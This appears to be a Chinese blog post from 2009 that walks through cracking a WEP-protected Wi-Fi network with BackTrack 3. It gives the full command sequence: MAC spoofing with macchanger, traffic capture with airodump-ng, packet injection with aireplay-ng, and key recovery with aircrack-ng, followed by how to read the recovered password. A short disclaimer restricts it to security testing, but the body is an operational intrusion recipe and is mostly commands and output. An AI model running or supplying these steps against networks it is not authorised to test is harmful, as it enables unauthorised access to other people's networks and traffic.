全部博文(1015)
分类:
2009-10-18 13:05:30
家庭测试通过,此为安全检测使用,请勿用此从事非法活动,切记!
参考:
1、安装BT3硬盘版
1.1 将BT3光盘镜像解压至任一分区根目录(这里假设放在D:\根目录下)
1.2 将bt3.xpm、FONTS、GRBT3这三个文件拷至系统分区(假定为C盘)
1.3 设置boot.ini
右键“我的电脑”-属性-高级-设置-编辑,添加代码
C:\GRBT3=START BT3
2、启动BT3
2.1 重启计算机,启动时选择Start BT3
2.2 从BT3启动菜单中选择启动D盘BT3
3、准备WIFI网卡
# modprobe –r iwl3945
# modprobe ipwraw
# iwconfig (查看无线网卡名称,这里假定为wifi0)
——————————————————–
##### 这里等同于iwconfig
locate airoscript (查看airoscript.sh位置)
# cd /usr/local/wicrawl/plugins/aircrack-wep-cracking/aircrack-ng-
0.9.1/airoscript/
# airoscript.sh
# 输入1 1 4(这一步选择WEP) 1
——————————————————–
# airmon-ng stop wifi0 (停用无线接口)
# ifconfig wifi0 down
# macchanger –mac 00:11:22:33:44:55 wifi0 (修改当前无线网卡MAC地址)
# airmon-ng start wifi0 (启用无线网卡)
4、连接到目标
# airodump-ng wifi0
# airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
(# airodump-ng -c 2 -w js2.out –bssid [bssid] wifi0)
(输入数据被导到test.out文件中,在后面将使用)
打开一个新的shell
# aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
(aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device])
用来产生一些伪造的数据包来加速数据的输出。
# airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66
迫使AP发出大量在破解WEP时可能会用到的数据包。
大收到大约10,000-20,000的数据包时就可以尝试破解WEP了。
再打开一个新的shell
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h
00:11:22:33:44:66 [device]
Use this packet ? y
Sent 10054 packets…(460pps)
当你得到了足够的包之后,就可以开始破解:
# aircrack-ng -n 128 -b [bssid] [filename]-01.cap
filename —- 为上面的test
“-n 128″ —-
代表128位WEP,如若失败,则尝试将128改成64,试试64位的。
成功后,可以看到:Key Found!的字样
后面接着的就是密码,形式为:00:13:22:33:44
那密码即为:0013223344。
至此,破解结束。